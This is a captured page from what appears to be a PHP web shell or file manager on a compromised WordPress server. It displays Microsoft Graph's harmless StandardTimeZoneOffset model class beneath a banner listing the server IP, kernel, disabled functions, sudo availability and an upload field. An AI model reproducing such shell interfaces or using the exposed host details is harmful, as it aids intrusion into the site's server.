Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/hopeinstoughton_www/vendor/microsoft/microsoft-graph/src/Model/ |
Upload File : |
<?php
/**
* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
*
* StandardTimeZoneOffset File
* PHP version 7
*
* @category Library
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* StandardTimeZoneOffset class
*
* @category Model
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
class StandardTimeZoneOffset extends Entity
{
/**
* Gets the dayOccurrence
* Represents the nth occurrence of the day of week that the transition from daylight saving time to standard time occurs.
*
* @return int|null The dayOccurrence
*/
public function getDayOccurrence()
{
if (array_key_exists("dayOccurrence", $this->_propDict)) {
return $this->_propDict["dayOccurrence"];
} else {
return null;
}
}
/**
* Sets the dayOccurrence
* Represents the nth occurrence of the day of week that the transition from daylight saving time to standard time occurs.
*
* @param int $val The value of the dayOccurrence
*
* @return StandardTimeZoneOffset
*/
public function setDayOccurrence($val)
{
$this->_propDict["dayOccurrence"] = $val;
return $this;
}
/**
* Gets the dayOfWeek
* Represents the day of the week when the transition from daylight saving time to standard time.
*
* @return DayOfWeek|null The dayOfWeek
*/
public function getDayOfWeek()
{
if (array_key_exists("dayOfWeek", $this->_propDict)) {
if (is_a($this->_propDict["dayOfWeek"], "\Microsoft\Graph\Model\DayOfWeek") || is_null($this->_propDict["dayOfWeek"])) {
return $this->_propDict["dayOfWeek"];
} else {
$this->_propDict["dayOfWeek"] = new DayOfWeek($this->_propDict["dayOfWeek"]);
return $this->_propDict["dayOfWeek"];
}
}
return null;
}
/**
* Sets the dayOfWeek
* Represents the day of the week when the transition from daylight saving time to standard time.
*
* @param DayOfWeek $val The value to assign to the dayOfWeek
*
* @return StandardTimeZoneOffset The StandardTimeZoneOffset
*/
public function setDayOfWeek($val)
{
$this->_propDict["dayOfWeek"] = $val;
return $this;
}
/**
* Gets the month
* Represents the month of the year when the transition from daylight saving time to standard time occurs.
*
* @return int|null The month
*/
public function getMonth()
{
if (array_key_exists("month", $this->_propDict)) {
return $this->_propDict["month"];
} else {
return null;
}
}
/**
* Sets the month
* Represents the month of the year when the transition from daylight saving time to standard time occurs.
*
* @param int $val The value of the month
*
* @return StandardTimeZoneOffset
*/
public function setMonth($val)
{
$this->_propDict["month"] = $val;
return $this;
}
/**
* Gets the time
* Represents the time of day when the transition from daylight saving time to standard time occurs.
*
* @return TimeOfDay|null The time
*/
public function getTime()
{
if (array_key_exists("time", $this->_propDict)) {
if (is_a($this->_propDict["time"], "\Microsoft\Graph\Model\TimeOfDay") || is_null($this->_propDict["time"])) {
return $this->_propDict["time"];
} else {
$this->_propDict["time"] = new TimeOfDay($this->_propDict["time"]);
return $this->_propDict["time"];
}
}
return null;
}
/**
* Sets the time
* Represents the time of day when the transition from daylight saving time to standard time occurs.
*
* @param TimeOfDay $val The value to assign to the time
*
* @return StandardTimeZoneOffset The StandardTimeZoneOffset
*/
public function setTime($val)
{
$this->_propDict["time"] = $val;
return $this;
}
/**
* Gets the year
* Represents how frequently in terms of years the change from daylight saving time to standard time occurs. For example, a value of 0 means every year.
*
* @return int|null The year
*/
public function getYear()
{
if (array_key_exists("year", $this->_propDict)) {
return $this->_propDict["year"];
} else {
return null;
}
}
/**
* Sets the year
* Represents how frequently in terms of years the change from daylight saving time to standard time occurs. For example, a value of 0 means every year.
*
* @param int $val The value of the year
*
* @return StandardTimeZoneOffset
*/
public function setYear($val)
{
$this->_propDict["year"] = $val;
return $this;
}
}